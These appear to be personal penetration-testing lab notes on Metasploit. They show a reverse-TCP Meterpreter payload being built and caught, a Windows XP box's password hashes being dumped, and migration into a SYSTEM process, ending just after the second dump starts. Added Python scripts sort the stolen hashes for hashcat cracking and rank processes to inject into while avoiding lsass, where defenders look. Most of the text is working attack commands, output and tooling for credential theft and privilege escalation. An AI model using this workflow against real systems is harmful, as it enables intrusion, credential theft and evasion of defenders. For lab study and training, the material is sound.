2010.02.08

Self Meterpreter Notes:

Using the new run hashdump script from HD Moore, thanks to pauldotcom. First build a stand-alone Meterpreter executable (X = write the payload out as a Windows PE executable):
msfpayload windows/meterpreter/reverse_tcp LHOST=d.d.d.d LPORT=d X > test.exe

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST d.d.d.d
LHOST => d.d.d.d
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
msf exploit(handler) >
[*] Starting the payload handler...
[*] Started reverse handler on port d

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (d.d.d.d:d -> d.d.d.d:49595)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: WINXPLAB01
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > getuid
Server username: WINXPLAB01\labuser
meterpreter > shell
Process 1088 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\labuser\Desktop>net localgroup administrators
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
labuser
The command completed successfully.
C:\Documents and Settings\labuser\Desktop>exit

meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:5b4834a4e5c2c97eab07a2c865fbcc3e:10362ac86d8a65482cc0010265605578:::
labuser:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:067c11d22e8bc3e9b51d0f4eb2a5952a:::
meterpreter >
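
Reading the pwdump lines above by eye is error-prone, so here is an added Python example (my own, not part of the original notes and not Metasploit code). It parses hashdump output, flags the RID 500 account, flags accounts whose NT hash is the well-known hash of the empty password, flags accounts that still have a real LM hash stored (XP stores LM hashes by default and LM is far cheaper to crack), and emits user:hash lines for hashcat's NTLM mode. The sample input is the hashdump output from the transcript above; the two empty-password hash constants are the standard values, stated rather than computed.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Well-known hashes of the empty password (standard constants, not computed here):
#   LM: two DES encryptions of "KGS!@#$%" under an all-zero (empty) key half.
#   NT: MD4 of the empty UTF-16LE string.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump line: user:RID:LMhash:NThash:::   (prompt lines and blanks simply fail to match)
PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32})", re.IGNORECASE)


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def empty_password(self) -> bool:
        # An empty NT hash is definitive: the account's password is empty.
        return self.nt == EMPTY_NT

    @property
    def lm_stored(self) -> bool:
        # A real LM hash means the password is <= 14 chars and LM storage was on.
        # The empty LM hash does NOT prove a long password: NoLMHash policy yields it too.
        return self.lm != EMPTY_LM


def parse_hashdump(text: str) -> list[Account]:
    accounts = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if m:
            accounts.append(Account(m.group(1), int(m.group(2)),
                                    m.group(3).lower(), m.group(4).lower()))
    return accounts


def triage(accounts: list[Account]) -> list[tuple[str, str]]:
    """Return (user, finding) pairs in the order a pentester would act on them."""
    findings = []
    for a in accounts:
        if a.rid == 500:
            findings.append((a.user, "RID 500: built-in Administrator, whatever it is named"))
        if a.empty_password:
            findings.append((a.user, "empty password (NT hash of the empty string)"))
        if a.lm_stored:
            findings.append((a.user, "LM hash stored: password <= 14 chars, crack LM first"))
    return findings


def hashcat_ntlm_lines(accounts: list[Account]) -> list[str]:
    # Format for: hashcat -m 1000 --username <file>
    return [f"{a.user}:{a.nt}" for a in accounts]


# Sample input: the priv-extension hashdump output from the transcript above.
SAMPLE = """
meterpreter > hashdump
Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:5b4834a4e5c2c97eab07a2c865fbcc3e:10362ac86d8a65482cc0010265605578:::
labuser:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:067c11d22e8bc3e9b51d0f4eb2a5952a:::
meterpreter >
"""

if __name__ == "__main__":
    accts = parse_hashdump(SAMPLE)
    for user, finding in triage(accts):
        print(f"{user:18} {finding}")
    print("\n".join(hashcat_ntlm_lines(accts)))
```

On the lab box this reports labuser and Guest with empty passwords and Administrator and HelpAssistant with LM hashes worth cracking first. Two caveats the hash lines cannot tell you: whether an account is disabled (Guest normally is), and whether an empty LM hash means a long password or just NoLMHash policy, so check the account flags before drawing conclusions from either.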

meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 0015e47d4ba625a79b4a4b94cfccb669...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_create_key: Operation failed: 5
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
meterpreter >

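The script's hint says to migrate into a service process, and the notes just pick pid 1040 without showing how it was chosen. Choosing that pid sensibly is the part a transcript does not show, so here is an added Python example (mine, not from the original notes and not Metasploit code) that parses the fixed-width table meterpreter's ps prints and ranks SYSTEM-owned processes to migrate into, skipping the ones you do not want to touch (lsass.exe, csrss.exe, smss.exe and the System process) and filtering on the payload's architecture. The ps listing is constructed to resemble the lab box; the column set (PID, Name, Arch, Session, User, Path), the process names and the pids are assumptions.

```python
from __future__ import annotations

SYSTEM_USER = r"NT AUTHORITY\SYSTEM"
COLUMNS = ("PID", "Name", "Arch", "Session", "User", "Path")   # assumed ps layout

# Long-lived service hosts first; the order expresses preference.
PREFERRED = ("services.exe", "winlogon.exe", "spoolsv.exe", "svchost.exe")
# Never inject here: crashing lsass/csrss/smss takes the box down, and lsass is
# exactly where defenders look for injection.
AVOID = {"lsass.exe", "csrss.exe", "smss.exe", "system", "[system process]"}


def parse_ps(text: str) -> list[dict[str, str]]:
    """Parse meterpreter 'ps' output by slicing each row at the header's column offsets."""
    lines = text.splitlines()
    hdr = next(i for i, l in enumerate(lines) if l.lstrip().startswith("PID"))
    starts = [lines[hdr].index(c) for c in COLUMNS]
    rows = []
    for line in lines[hdr + 2:]:            # hdr + 1 is the dashed underline
        if not line.strip():
            continue
        row = {}
        for i, col in enumerate(COLUMNS):
            end = starts[i + 1] if i + 1 < len(COLUMNS) else None
            row[col] = line[starts[i]:end].strip()
        rows.append(row)
    return rows


def migration_candidates(rows: list[dict[str, str]], arch: str = "x86") -> list[dict[str, str]]:
    """SYSTEM-owned processes matching the payload's architecture, best target first."""
    cands = [r for r in rows
             if r["User"] == SYSTEM_USER
             and r["Name"].lower() not in AVOID
             and r["Arch"] == arch]

    def rank(r: dict[str, str]) -> tuple[int, int]:
        name = r["Name"].lower()
        pref = PREFERRED.index(name) if name in PREFERRED else len(PREFERRED)
        return (pref, int(r["PID"]))

    return sorted(cands, key=rank)


# Constructed sample in the fixed-width layout meterpreter's ps prints (not captured output).
SAMPLE_PS = r"""
Process list
============

 PID   Name               Arch  Session  User                   Path
 ---   ----               ----  -------  ----                   ----
 0     [System Process]
 4     System             x86   0        NT AUTHORITY\SYSTEM
 544   smss.exe           x86   0        NT AUTHORITY\SYSTEM    \SystemRoot\System32\smss.exe
 608   csrss.exe          x86   0        NT AUTHORITY\SYSTEM    \??\C:\WINDOWS\system32\csrss.exe
 632   winlogon.exe       x86   0        NT AUTHORITY\SYSTEM    \??\C:\WINDOWS\system32\winlogon.exe
 676   services.exe       x86   0        NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\services.exe
 688   lsass.exe          x86   0        NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\lsass.exe
 1040  spoolsv.exe        x86   0        NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\spoolsv.exe
 1088  cmd.exe            x86   0        WINXPLAB01\labuser     C:\WINDOWS\system32\cmd.exe
 1244  explorer.exe       x86   0        WINXPLAB01\labuser     C:\WINDOWS\Explorer.EXE
 1500  test.exe           x86   0        WINXPLAB01\labuser     C:\Documents and Settings\labuser\Desktop\test.exe
"""

if __name__ == "__main__":
    for r in migration_candidates(parse_ps(SAMPLE_PS)):
        print(f"migrate {r['PID']:<6} {r['Name']}")
```

Paste the real ps output into SAMPLE_PS (or read it from a file) and take the first candidate; if your Meterpreter version prints different columns, adjust COLUMNS to match its header line. Migrating into a process of the wrong architecture fails, which is why the arch filter is there.
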
/* error 5 = ERROR_ACCESS_DENIED. The priv hashdump above worked because labuser is a local admin (it pulls the hashes out of LSASS); run hashdump instead reads the SAM hive through the registry, which only SYSTEM can open. Pick a SYSTEM-owned process from ps and migrate into it */
meterpreter > migrate 1040
[*] Migrating to 1040...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 0015e47d4ba625a79b4a4b94cfccb669...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...